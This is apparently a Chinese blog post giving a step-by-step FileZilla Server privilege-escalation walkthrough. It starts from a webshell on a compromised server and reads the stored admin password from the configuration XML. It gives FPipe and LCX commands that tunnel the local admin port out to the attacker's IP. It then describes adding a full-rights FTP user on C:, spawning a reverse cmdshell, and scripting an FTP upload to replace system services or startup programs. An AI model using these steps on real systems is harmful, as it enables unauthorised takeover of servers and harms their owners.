曲折的FileZilla Server提權之路

點評:明白以上三點後現在就是嘗試如何連接到服務器上的FileZilla Server。
首先查看FileZilla Server Interface.xml中的內容

首先明確一下以下三個要素:
一、FileZilla Server安裝路徑,為得到FileZilla Server Interface.xml文件提供條件。
二、本地FileZilla Server要與服務器版本兼容,不然會提示版本不同,協議錯誤。
三、FileZilla Server中FileZilla Server Interface.xml文件保存瞭管理口令。
明白以上三點後現在就是嘗試如何連接到服務器上的FileZilla Server。
首先查看FileZilla Server Interface.xml中的內容

復制代碼代碼如下:
<FileZillaServer>
<Settings>
<Item name=”Last Server Address” type=”string”>127.0.0.1</Item>
<Item name=”Last Server Port” type=”numeric”>14147</Item>
<Item name=”Last Server Password” type=”string”>qwertyu</Item>
<Item name=”Always use last server” type=”numeric”>0</Item>
<Item name=”User Sorting” type=”numeric”>0</Item>
</Settings>
</FileZillaServer>

name="Last Server Address" type="string"
127.0.0.1為服務器IP,此處默認定義為127.0.0.1綁定在本地,不是綁定在0.0.0.0所以隻能本地連接上去。
name="Last Server Port" type="numeric"
14147為FileZilla Server管理連接端口,默認值14147
name="Last Server Password" type="string"
qwertyu為管理口令,此處口令為安裝時自定義,要在此文件中得到口令必須在配置中勾取保存口令選項。
現在說說實際中比較BT的狀況如何處理。
服務器對外隻開放80,得到權限為webshell,服務器唯一安裝第三方軟件為FileZilla Server。數據庫為Ms-SQL2005,無Systemadmin權限賬戶,現有數據庫賬戶為DB權限,禁止瞭一切與數據庫有關的備份功能。
測試網絡環境,對外開放80,shell中netstat -an中看到有21,80,1433,3389三個外部端口,內部端口有14147。經測試發現,除80端口外其餘全部無法連接。
如上情況下,要取得服務器權限能用到的隻能是FileZilla Server。當然,從外部看,服務器確實十分健碩,但從內部看的話還是有機可乘的。首先明確下第一目的,首先要做的是得到FileZilla Server的管理權限,但是FileZilla Server的管理端口綁定在127.0.0.1:14147上,外部是無法訪問到的。
要得到外部訪問權限我們可以用LCX開發的LCX.EXE端口反彈轉發程序實現,但是在現實測試的時候發現FileZilla Server對於網絡環境要求非常之高,這也是FileZilla Server的訪問協議造成的,直接用LCX.EXE轉發是極不穩定的(在光纖環境下測試也連接不上)。再者網上的唯一一份FileZilla Server提權教程中提到瞭FPipe.exe程序。FPipe.exe程序為實現端口轉發功能而開發的,其作用可將本地端口監聽數據轉發功能。在當前 條件下,即使將本地綁定端口轉發到外部端口也是連接不上的,估計是硬防。
現在可以知道環境是極其BT的,尋找突破的道路是需要發掘的,我的方法是,用FPipe.exe將14147端口轉發到外部其他端口,再用LCX.EXE 將FPipe.exe端口轉發出來。FPipe.exe -v -l 1234 -r 14147 127.0.0.1。本地LCX.EXE -LISTEN 1234 14147。服務器上LCX.EXE -SLAVE 本機IP 1234 服務器IP 1234。這樣就能實現本地連接瞭,但是還是對網絡環境要求很高的。
然後本地連接上FileZilla Server管理,然後添加一個FTP用戶,用戶目錄設置為C:勾取所有權限操作選項。FileZilla Server添加FTP用戶的工作就結束瞭。
現在是提升權限的問題瞭,FileZilla Server不比serv-U,可以quote site exec執行dos命令(不知道是不行還是有其他參數可以實現,我不懂…)要實現提權的話可以FTP登錄上去操作文件管理,如替換系統服務、替換系統 文件、將程序置於啟動目錄等等。
現在的問題是服務器開放瞭21端口,但是外部是不能訪問的,FTP端口轉發出來也不穩定,極易斷開。現在辦法是直接從服務器上登錄服務器FTP。反彈一個cmdshell,然後寫個ftp自動處理腳本
open 127.0.0.1 21
user
pass
put soft.exe 存放目錄
bye
然後本地ftp.exe -s:ftp.txt就能實現本地上傳本地瞭。就此,以FileZilla Server提升權限也實現瞭。

Leave a Reply

Your email address will not be published. Required fields are marked *